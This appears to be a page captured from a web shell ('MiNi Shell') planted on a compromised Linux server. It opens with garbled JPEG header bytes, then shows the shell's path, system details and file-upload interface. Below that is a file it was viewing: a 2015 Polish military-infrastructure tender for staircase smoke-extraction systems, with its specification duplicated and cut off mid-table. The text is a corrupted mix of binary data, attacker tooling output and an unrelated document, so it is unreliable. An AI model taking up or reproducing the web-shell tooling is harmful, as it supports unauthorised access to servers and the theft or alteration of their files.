JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150909/234152-N-2015.html

<p class="kh_header"><b>Wrocław: WYKONANIE INSTALACJI ODDYMIANIA 2 KLATEK SCHODOWYCH
CZĘŚĆ I -  wymiana instalacji oddymiania 2 klatek schodowych w budynku nr 5 na terenie JW 2399 Świętoszów ul. Sztabowa 1
CZĘŚĆ II - wymiana instalacji oddymiania 2 klatek schodowych w budynku nr 6 na terenie JW 2399 Świętoszów ul. Sztabowa 1</b><br>
<b>Numer ogłoszenia: 234152 - 2015; data zamieszczenia: 09.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd Infrastruktury , ul. Obornicka 126, 50-984 Wrocław, woj. dolnośląskie, tel. 261 65 68 40, faks 261 65 68 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rziwroclaw.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE INSTALACJI ODDYMIANIA 2 KLATEK SCHODOWYCH
CZĘŚĆ I -  wymiana instalacji oddymiania 2 klatek schodowych w budynku nr 5 na terenie JW 2399 Świętoszów ul. Sztabowa 1
CZĘŚĆ II - wymiana instalacji oddymiania 2 klatek schodowych w budynku nr 6 na terenie JW 2399 Świętoszów ul. Sztabowa 1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> WYKONANIE  INSTALACJI  ODDYMIANIA 2 KLATEK SCHODOWYCH w BUDYNKU
Nr 5 NA TERENIE JW 2399  ŚWIĘTOSZÓW ul. SZTABOWA 1
Budynek koszarowy nr 6 jest to budynkiem trzykondygnacyjnym     podpiwniczonym z poddaszem nieużytkowym  o bryle prostej  wzniesionej na planie wydłużonego prostokąta  z dwuspadowym dachem krytym dachówką  ceramiczną. Ściany budynku murowane, stropy  prefabrykowane z płyt WPS, schody kamienne oparte na belkach stalowych .Elewacje budynku wykończone cegłą klinkierową. Budynek wyposażony jest w instalacje : elektryczną, teletechniczną , wodno  - kanalizacyjną,  centralnego ogrzewania  oraz instalację odgromową.
Zakres robót objętych w Specyfikacji Technicznej
Ustalenia  zawarte w  niniejszej  Specyfikacji dotyczą  prowadzenia prac przy realizacji wykonania instalacji oddymiającej w budynku nr 6 w Świętoszowie :
- Montaż stolarki drzwiowej o odporności ogniowej EI 30 
- Wymiana stolarki drzwiowej drewnianej na stolarkę o odporności ogniowej EI 30 
- Wykonanie instalacji oddymiania klatek schodowych
- Montaż okien oddymiających w połaci dachu  z deflektorem i siłownikami
- Montaż ścianek o odporności ogniowej REI 60
- Wykonanie obróbek blacharskich w miejscu montażu okien oddymiających
ROBOTY BUDOWLANE
Ślusarka  drzwiowa
W ścianach wydzielających klatki schodowe należy zamontować drzwi aluminiowe 90/200 i 100/200 o odporności ogniowej EI 30 oraz dokonać wymiany istniejących drzwi drewnianych na drzwi o odporności ogniowej EI30. Drzwi należy wyposażyć w siłowniki typu DDS 54/500 oraz sprężyny typy YALE. Siłowniki nie są związane na sztywno ze skrzydłem drzwiowym co umożliwia ich normalne użytkowanie. Montaż drzwi należy rozpocząć od właściwego ustawienia w otworach ściany i tymczasowo umocowanych za pomocą podkładek i klinów wbijanych przy narożnikach między ościeżnicą a ościeżem. Punkty zamocowania ościeżnic powinny znajdować się w odległości ok. 25 cm od górnej i dolnej powierzchni otworu. Odległość między tymi punktami nie może być większa niż 70 cm dla  drzwi.  Prawidłowość osadzenia drzwi należy kontrolować za pomocą poziomicy. Największe dopuszczalne odchylenie umocowanego elementu od pionu lub poziomu nie powinno przekraczać 2 mm na 1m lecz nie więcej niż 3 mm na całą ościeżnicę. W drzwiach wejściowych do budynku należy zainstalować siłowniki umożliwiające automatyczne otwarcie w przypadku uruchomienia instalacji oddymiającej 
Okna oddymiające
W połaci dachu należy wykonać otwory  poprzez rozebranie części pokrycia dachowego z dachówki a następnie zamontować po 2 okna oddymiające na każdą klatkę schodową wyposażone w siłowniki np.serii KA 34/800 o wysięgu 800 mm z deflektorem o wymiarach 780x1398 mm oraz  powierzchni czynnej oddymiania 0,6 mm2. Okna montować między krokwiami za pomocą wkrętów do drzewa. Punkty zamocowania ościeżnic powinny znajdować się w odległości ok. 25 cm od górnej i dolnej powierzchni otworu. Odległość między tymi punktami nie może być większa niż 100 cm dla okien. Przy montażu okien oddymiających należy wykonać otwór w stropie dla kanału oddymiającego o wym. 1200x1720 mm . Połączenie otworu z oknami oddymiającymi należy wykonać   w formie kanału wykonanego z płyt gipsowo-kartonowych przeciwpożarowych GR 12,5 mm  na rusztach metalowych o pokryciu jednostronnym dwuwarstwowo przy rozstawie słupków 40 cm.
Ściany
Ściany wydzielające klatki schodowe należy wykonać  murowane o odporności ogniowej EI 60 z  bloczków z betonu komórkowego gr. 12 cm, na  zaprawie  cementowo - wapiennej z zachowaniem zasad normalnego wiązania na  pełne   spoiny   o  grubości  nie  przekraczającej 15 mm  w przypadku spoin poziomych i 10 mm w przypadku spoin pionowych. Wszystkie przejścia kabli projektowanych instalacji oraz istniejących rur stalowych CO przez przegrody stanowiące wydzielenia stref pożarowych należy uszczelnić masami ognioodpornymi w klasie EI 60.
Tynki 
Po wymurowaniu ścian i osadzeniu stolarki drzwiowej należy wykonać tynki doborowe kat. IV jako trójwarstwowe składające się z obrzutki, narzutu wyrównawczego oraz gładzi starannie zatartej na gładko packą metalową lub drewnianą. Strop nad klatką schodową wydzielający ją od nieużytkowego poddasza należy zabezpieczyć poprzez montaż 2 przeciwpożarowych płyt gipsowych gr. 12,5 cm. Przymocowanie płyt do gotowego podłoża należy dokonać za pomocą wkrętów wraz z przecięciem i dopasowaniem. Do wyrównania powierzchni okładzin oraz połączeń i styków płyt  należy stosować gips szpachlowy. Spoiny należy zabezpieczyć taśmą oraz wykonać szpachlowanie i cyklinowanie wykańczające płyt.
Obróbki blacharskie
W miejscu  montażu  okien  oddymiających należy wykonać obróbki blacharskie ze stali cynkowej   malowanej    proszkowo  gr. 0.6 mm  w  kolorze  kołnierzy  uszczelniających. 
Obróbki blacharskie rozpocząć od   cięcia, wygięcie i dopasowanie blachy na wymiar otworu okiennego.  Połączenia arkuszy blachy wykonać na podwójny rąbek. Po dopasowaniu  obróbki blacharskiej okien należy ją przymocować wkrętami do krokwi za pomocą wkrętów lub gwoździ z polutowaniem. 
Malowanie
Malowanie farbami poliwinylowymi tynków gładkich należy rozpocząć od przygotowania powierzchni, która powinna być sucha, czysta i odtłuszczona. Przed malowaniem farbę należy dokładnie wymieszać. Przed  pierwszym  malowaniem należy powierzchnię zagruntować a następnie dwukrotnie malować pędzlem, wałkiem lub natryskowo. Prace malarskie prowadzić w temperaturze +5 do+250 C.
Roboty demontażowe
Roboty demontażowe polegać będą na zdemontowaniu istniejących drzwi drewnianych oraz montaż w ich miejsce drzwi o odporności ogniowej EI30 . Roboty związane z demontażem istniejących drzwi i montażem nowych drzwi i okien oddymiających należy rozpocząć od zabezpieczenia obszaru prac tak, aby nie zagrażały osobom przebywającym w trakcie prowadzenia prac na obiekcie. Prace należy wykonywać zachowując szczególną ostrożność i przestrzegając przepisy bezpieczeństwa i higieny pracy. 
Należy przy tym przestrzegać przepisów bhp dotyczących pracy z przedmiotami ciężkimi. Elementy materiałów z rozbiórki wraz z powstałym gruzem usunąć z remontowanego obiektu na uprzednio przygotowany oraz zabezpieczony teren - uzgodniony z Inwestorem . Należy pamiętać, że prace będą odbywały się w czynnym budynku. W związku z tym, należy uwzględnić to, że nie zawsze będzie można pracować wykonując prace powodujące znaczny hałas. Transport materiałów, narzędzi i elementów z rozbiórki odbywać się będzie schodami klatki schodowej.
ROBOTY BRANŻY TELETECHNICZNEJ 
Montaż Instalacji teletechnicznych (okablowanie) 
Przed przystąpieniem do wykonania   instalacji  teletechniycznych - okablowania należy sprawdzić   wykrywaczem  metalu  w  miejscach  prowadzenia  robót  ( układania  listew elektroinstalacyjnych )  czy  nie  są  one  w  kolizji  z ułożonymi pod tynkiem istniejącymi instalacjami elektrycznymi. 
Przewidywany zakres robót obejmuje:  
- mechaniczne  przebicie  otworów  w  ścianach  i stropach z cegły o długości przebicia do 1i1/2 cegły i średnicy do 40 mm,
- montaż  listew  elektroinstalacyjnych  LN  40x16mm  na  podłożu  z cegieł za pomocą kołków  rozporowych  fi 8 mm  z  przygotowaniem  podłoża. Przy układaniu w/w listew stosować: łączniki  proste, łączniki  kątowe  zewnętrzne  i  wewnętrzne  oraz  zaślepki listew elektroinstalacyjnych LN 40x16mm,  
- montaż listew elektroinstalacyjnych  LN 25x16mm na podłożu betonowym za pomocą kołków  rozporowych  fi 8 mm  z  przygotowaniem  podłoża. Przy układaniu w/w listew stosować: łączniki  proste, łączniki  kątowe  zewnętrzne  i  wewnętrzne  oraz  zaślepki listew elektroinstalacyjnych LN 25x16mm,  
- ułożenie przewodów kabelkowych HDGs 3x2,5 mm2  w listwach elektroinstalacyjnych między tablicą piętrową , a centralką oddymiania (zasilanie),
- ułożenie przewodów kabelkowych HDGs 3x2,5 mm2  w listwach elektroinstalacyjnych       
- ułożenie przewodów kabelkowych HTKSH ekw 3x2x0,8 mm2  w listwach elektroinsta- lacyjnych,
- ułożenie  przewodów  kabelkowych  YDY 4x0,8 mm2 w listwach elektroinstalacyjnych   
- ułożenie przewodów kabelkowych YnTKSY ekw 1x2x0,8 mm2 w listwach elektroinsta- lacyjnych,    
- montaż w tablicach piętrowych wyłącznika n/prądowego typu S301B16A	
Montaż urządzeń i aparatów systemów oddymiania klatek schodowych        
Przewidywany zakres robót obejmuje:
- przygotowanie  podłoża  (mechaniczne wywiercenie 4 otworów w cegle z osadzeniem kołków rozporowych plastikowych fi 10mm) pod centralki oddymiania np. RZN 4408-K
- montaż kompaktowych centralek oddymiania np. RZN 4408-K na gotowym podłożu,
- montaż akumulatorów zasadowo-żelowych 12V/3,4Ah w w/w centralkach oddymiania Uwaga 2 szt. w centralce)
- przygotowanie  podłoża  ( mechaniczne  wiercenie  4 otworów  w cegle z osadzeniem kołków rozporowych plastikowych fi 8mm )  pod  n/w  aparaty,
- montaż   na   gotowym   podłożu  ręcznych  ostrzegawczy  pożaru  -  n/t   przycisków oddymiania np. RT 45 koloru pomarańczowego,
- montaż na gotowym podłożu przycisków przewietrzania n/t z kluczykiem np. SLT 42A 
- montaż  na  gotowym  podłożu  modułów  przekaźników  np. TR 43-K  z  obudowami ( puszkami przekaźnika ),
- montaż na gotowym podłożu puszek połączeniowych np. PIP 2A.
- montaż na gotowym  podłożu optycznych czujek dymu np. DOR 40  z  gniazdami G 40
- podłączenie w/w aparatów do centrali oddymiania
- podłączenie napędów siłowników klap oddymiających (okna) do systemów oddymiania klatek schodowych ( siłowniki ujęte w branży budowlanej razem z oknami oddymiania )
- przygotowanie  podłoża  do  montażu  siłowników  drzwiowych  np. DDS 54/500
- montaż   z   podłączeniem   napędów   w/w   słowników   drzwiowych   do   systemów oddymiania  i  przewietrzania oraz załączania rygla drzwi w systemie kontroli dostępu,
- oznakowanie przycisków oddymiania znakiem bezpieczeństwa ochrony 
przeciwpożarowej (fluorescencyjny) Uruchamianie ręczne wg PN-92 N-01256/01 (ISO 6309:1987) na płycie fotoluminescencyjnej samoprzylepnej typu Antach Light (barwy białej)  o wym. F=150/150 mm
- przygotowanie  i  testowanie  oprogramowania  systemu  alarmowego  do 25  kroków programowych (instrukcji),
- wykonanie prób  i  testów systemów alarmowych oddymiania  i przewietrzania  klatek schodowych oraz zadziałania rygli w drzwiach wejściowych systemu kontroli dostępu (do 24 elementów liniowych).  
Montaż instalacji powinien być wykonany przez odpowiednio wykwalifikowany personel z zastosowaniem właściwych materiałów i urządzeń. Osprzęt instalacyjny należy mocować do podłoża w sposób trwały zapewniający mocne i bezpieczne jego osadzenie. Połączenia między żyłami przewodów oraz między żyłami i innym wyposażeniem powinny być wykonane w taki sposób, aby był zapewniony bezpieczny i pewny styk. Przewody muszą być ułożone swobodnie i nie mogą być narażone na naciągi i dodatkowe naprężenia. Centralki sterujące oddymianiem klatek schodowych należy zainstalować na ścianie, powyżej wysokości 1,5 m od podłogi. 
WYKONANIE  INSTALACJI  ODDYMIANIA 2 KLATEK SCHODOWYCH w BUDYNKU
Nr 6 NA TERENIE JW 2399  ŚWIĘTOSZÓW ul. SZTABOWA 1
Budynek koszarowy nr 6 jest to budynkiem trzykondygnacyjnym     podpiwniczonym z poddaszem nieużytkowym  o bryle prostej  wzniesionej na planie wydłużonego prostokąta  z dwuspadowym dachem krytym dachówką  ceramiczną. Ściany budynku murowane, stropy  prefabrykowane z płyt WPS, schody kamienne oparte na belkach stalowych .Elewacje budynku wykończone cegłą klinkierową. Budynek wyposażony jest w instalacje : elektryczną, teletechniczną , wodno  - kanalizacyjną,  centralnego ogrzewania  oraz instalację odgromową.
 Zakres robót objętych w Specyfikacji Technicznej
Ustalenia  zawarte w  niniejszej  Specyfikacji dotyczą  prowadzenia prac przy realizacji wykonania instalacji oddymiającej w budynku nr 6 w Świętoszowie :
- Montaż stolarki drzwiowej o odporności ogniowej EI 30 
- Wymiana stolarki drzwiowej drewnianej na stolarkę o odporności ogniowej EI 30 
- Wykonanie instalacji oddymiania klatek schodowych
- Montaż okien oddymiających w połaci dachu  z deflektorem i siłownikami
- Montaż ścianek o odporności ogniowej REI 60
- Wykonanie obróbek blacharskich w miejscu montażu okien oddymiających.
ROBOTY BUDOWLANE
Ślusarka  drzwiowa
W ścianach wydzielających klatki schodowe należy zamontować drzwi aluminiowe 90/200 i 100/200 o odporności ogniowej EI 30 oraz dokonać wymiany istniejących drzwi drewnianych na drzwi o odporności ogniowej EI30. Drzwi należy wyposażyć w siłowniki typu DDS 54/500 oraz sprężyny typy YALE. Siłowniki nie są związane na sztywno ze skrzydłem drzwiowym co umożliwia ich normalne użytkowanie. Montaż drzwi należy rozpocząć od właściwego ustawienia w otworach ściany i tymczasowo umocowanych za pomocą podkładek i klinów wbijanych przy narożnikach między ościeżnicą a ościeżem. Punkty zamocowania ościeżnic powinny znajdować się w odległości ok. 25 cm od górnej i dolnej powierzchni otworu. Odległość między tymi punktami nie może być większa niż 70 cm dla  drzwi.  Prawidłowość osadzenia drzwi należy kontrolować za pomocą poziomicy. Największe dopuszczalne odchylenie umocowanego elementu od pionu lub poziomu nie powinno przekraczać 2 mm na 1m lecz nie więcej niż 3 mm na całą ościeżnicę. W drzwiach wejściowych do budynku należy zainstalować siłowniki umożliwiające automatyczne otwarcie w przypadku uruchomienia instalacji oddymiającej 
Okna oddymiające
W połaci dachu należy wykonać otwory  poprzez rozebranie części pokrycia dachowego z dachówki a następnie zamontować po 2 okna oddymiające na każdą klatkę schodową wyposażone w siłowniki np.serii KA 34/800 o wysięgu 800 mm z deflektorem o wymiarach 780x1398 mm oraz  powierzchni czynnej oddymiania 0,6 mm2. Okna montować między krokwiami za pomocą wkrętów do drzewa. Punkty zamocowania ościeżnic powinny znajdować się w odległości ok. 25 cm od górnej i dolnej powierzchni otworu. Odległość między tymi punktami nie może być większa niż 100 cm dla okien. Przy montażu okien oddymiających należy wykonać otwór w stropie dla kanału oddymiającego o wym. 1200x1720 mm . Połączenie otworu z oknami oddymiającymi należy wykonać   w formie kanału wykonanego z płyt gipsowo-kartonowych przeciwpożarowych GR 12,5 mm  na rusztach metalowych o pokryciu jednostronnym dwuwarstwowo przy rozstawie słupków 40 cm.
Ściany
Ściany wydzielające klatki schodowe należy wykonać  murowane o odporności ogniowej EI 60 z  bloczków z betonu komórkowego gr. 12 cm, na  zaprawie  cementowo - wapiennej z zachowaniem zasad normalnego wiązania na  pełne   spoiny o  grubości  nie  przekraczającej 15 mm  w przypadku spoin poziomych i 10 mm w przypadku spoin pionowych. Wszystkie przejścia kabli projektowanych instalacji oraz istniejących rur stalowych CO przez przegrody stanowiące wydzielenia stref pożarowych należy uszczelnić masami ognioodpornymi w klasie EI 60.
Tynki 
Po wymurowaniu ścian i osadzeniu stolarki drzwiowej należy wykonać tynki doborowe kat. IV jako trójwarstwowe składające się z obrzutki, narzutu wyrównawczego oraz gładzi starannie zatartej na gładko packą metalową lub drewnianą. Strop nad klatką schodową wydzielający ją od nieużytkowego poddasza należy zabezpieczyć poprzez montaż 2 przeciwpożarowych płyt gipsowych gr. 12,5 cm. Przymocowanie płyt do gotowego podłoża należy dokonać za pomocą wkrętów wraz z przecięciem i dopasowaniem. Do wyrównania powierzchni okładzin oraz połączeń i styków płyt  należy stosować gips szpachlowy. Spoiny należy zabezpieczyć taśmą oraz wykonać szpachlowanie i cyklinowanie wykańczające płyt.
Obróbki blacharskie
W miejscu  montażu  okien  oddymiających należy wykonać obróbki blacharskie ze stali cynkowej   malowanej    proszkowo  gr. 0.6 mm  w  kolorze  kołnierzy  uszczelniających. 
Obróbki blacharskie rozpocząć od   cięcia, wygięcie i dopasowanie blachy na wymiar otworu okiennego.  Połączenia arkuszy blachy wykonać na podwójny rąbek. Po dopasowaniu  obróbki blacharskiej okien należy ją przymocować wkrętami do krokwi za pomocą wkrętów lub gwoździ z polutowaniem. 
Malowanie
Malowanie farbami poliwinylowymi tynków gładkich należy rozpocząć od przygotowania powierzchni, która powinna być sucha, czysta i odtłuszczona. Przed malowaniem farbę należy dokładnie wymieszać. Przed  pierwszym  malowaniem należy powierzchnię zagruntować a następnie dwukrotnie malować pędzlem, wałkiem lub natryskowo. Prace malarskie prowadzić w temperaturze +5 do+250 C.
Roboty demontażowe
Roboty demontażowe polegać będą na zdemontowaniu istniejących drzwi drewnianych oraz montaż w ich miejsce drzwi o odporności ogniowej EI30 . Roboty związane z demontażem istniejących drzwi i montażem nowych drzwi i okien oddymiających należy rozpocząć od zabezpieczenia obszaru prac tak, aby nie zagrażały osobom przebywającym w trakcie prowadzenia prac na obiekcie. Prace należy wykonywać zachowując szczególną ostrożność i przestrzegając przepisy bezpieczeństwa i higieny pracy. 
Należy przy tym przestrzegać przepisów bhp dotyczących pracy z przedmiotami ciężkimi. Elementy materiałów z rozbiórki wraz z powstałym gruzem usunąć z remontowanego obiektu na uprzednio przygotowany oraz zabezpieczony teren - uzgodniony z Inwestorem . Należy pamiętać, że prace będą odbywały się w czynnym budynku. W związku z tym, należy uwzględnić to, że nie zawsze będzie można pracować wykonując prace powodujące znaczny hałas. Transport materiałów, narzędzi i elementów z rozbiórki odbywać się będzie schodami klatki schodowej.
ROBOTY BRANŻY TELETECHNICZNEJ 
Montaż Instalacji teletechnicznych (okablowanie) 
Przed przystąpieniem do wykonania   instalacji  teletechniycznych - okablowania należy sprawdzić   wykrywaczem  metalu  w  miejscach  prowadzenia  robót  ( układania  listew elektroinstalacyjnych )  czy  nie  są  one  w  kolizji  z ułożonymi pod tynkiem istniejącymi instalacjami elektrycznymi. 
Przewidywany zakres robót obejmuje:  
- mechaniczne  przebicie  otworów  w  ścianach  i stropach z cegły o długości przebicia do 1i1/2 cegły i średnicy do 40 mm,
- montaż  listew  elektroinstalacyjnych  LN  40x16mm  na  podłożu  z cegieł za pomocą    kołków  rozporowych  fi 8 mm  z  przygotowaniem  podłoża. Przy układaniu w/w listew stosować: łączniki  proste, łączniki  kątowe  zewnętrzne  i  wewnętrzne  oraz  zaślepki listew elektroinstalacyjnych LN 40x16mm,  
- montaż listew elektroinstalacyjnych  LN 25x16mm na podłożu betonowym za pomocą    kołków  rozporowych  fi 8 mm  z  przygotowaniem  podłoża. Przy układaniu w/w listew stosować: łączniki  proste, łączniki  kątowe  zewnętrzne  i  wewnętrzne  oraz  zaślepki listew elektroinstalacyjnych LN 25x16mm,  
- ułożenie przewodów kabelkowych HDGs 3x2,5 mm2  w listwach elektroinstalacyjnych między tablicą piętrową , a centralką oddymiania (zasilanie),
- ułożenie przewodów kabelkowych HDGs 3x2,5 mm2  w listwach elektroinstalacyjnych       
- ułożenie przewodów kabelkowych HTKSH ekw 3x2x0,8 mm2  w listwach elektroinsta- lacyjnych,
- ułożenie  przewodów  kabelkowych  YDY 4x0,8 mm2 w listwach elektroinstalacyjnych   
- ułożenie przewodów kabelkowych YnTKSY ekw 1x2x0,8 mm2 w listwach elektroinsta- lacyjnych,    
- montaż w tablicach piętrowych wyłącznika n/prądowego typu S301B16A	
Montaż urządzeń i aparatów systemów oddymiania klatek schodowych        
Przewidywany zakres robót obejmuje:
- przygotowanie  podłoża  (mechaniczne wywiercenie 4 otworów w cegle z osadzeniem kołków rozporowych plastikowych fi 10mm) pod centralki oddymiania np. RZN 4408-K
- montaż kompaktowych centralek oddymiania np. RZN 4408-K na gotowym podłożu,
- montaż akumulatorów zasadowo-żelowych 12V/3,4Ah w w/w centralkach oddymiania Uwaga 2 szt. w centralce)
- przygotowanie  podłoża  ( mechaniczne  wiercenie  4 otworów  w cegle z osadzeniem kołków rozporowych plastikowych fi 8mm )  pod  n/w  aparaty,
- montaż   na   gotowym   podłożu  ręcznych  ostrzegawczy  pożaru  -  n/t   przycisków oddymiania np. RT 45 koloru pomarańczowego,
- montaż na gotowym podłożu przycisków przewietrzania n/t z kluczykiem np. SLT 42A 
- montaż  na  gotowym  podłożu  modułów  przekaźników  np. TR 43-K  z  obudowami ( puszkami przekaźnika ),
- montaż na gotowym podłożu puszek połączeniowych np. PIP 2A.
- montaż na gotowym  podłożu optycznych czujek dymu np. DOR 40  z  gniazdami G 40
- podłączenie w/w aparatów do centrali oddymiania
- podłączenie napędów siłowników klap oddymiających (okna) do systemów oddymiania klatek schodowych ( siłowniki ujęte w branży budowlanej razem z oknami oddymiania )
- przygotowanie  podłoża  do  montażu  siłowników  drzwiowych  np. DDS 54/500
- montaż   z   podłączeniem   napędów   w/w   słowników   drzwiowych   do   systemów 
  oddymiania  i  przewietrzania oraz załączania rygla drzwi w systemie kontroli dostępu,
- oznakowanie przycisków oddymiania znakiem bezpieczeństwa ochrony 
  przeciwpożarowej (fluorescencyjny) Uruchamianie ręczne wg PN-92 N-01256/01 (ISO 6309:1987) na płycie fotoluminescencyjnej samoprzylepnej typu Antach Light (barwy białej)  o wym. F=150/150 mm
- przygotowanie  i  testowanie  oprogramowania  systemu  alarmowego  do 25  kroków programowych (instrukcji),
- wykonanie prób  i  testów systemów alarmowych oddymiania  i przewietrzania  klatek schodowych oraz zadziałania rygli w drzwiach wejściowych systemu kontroli dostępu (do 24 elementów liniowych).  
Montaż instalacji powinien być wykonany przez odpowiednio wykwalifikowany personel z zastosowaniem właściwych materiałów i urządzeń. Osprzęt instalacyjny należy mocować do podłoża w sposób trwały zapewniający mocne i bezpieczne jego osadzenie. Połączenia między żyłami przewodów oraz między żyłami i innym wyposażeniem powinny być wykonane w taki sposób, aby był zapewniony bezpieczny i pewny styk. Przewody muszą być ułożone swobodnie i nie mogą być narażone na naciągi i dodatkowe naprężenia. Centralki sterujące oddymianiem klatek schodowych należy zainstalować na ścianie, powyżej wysokości 1,5 m od podłogi.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
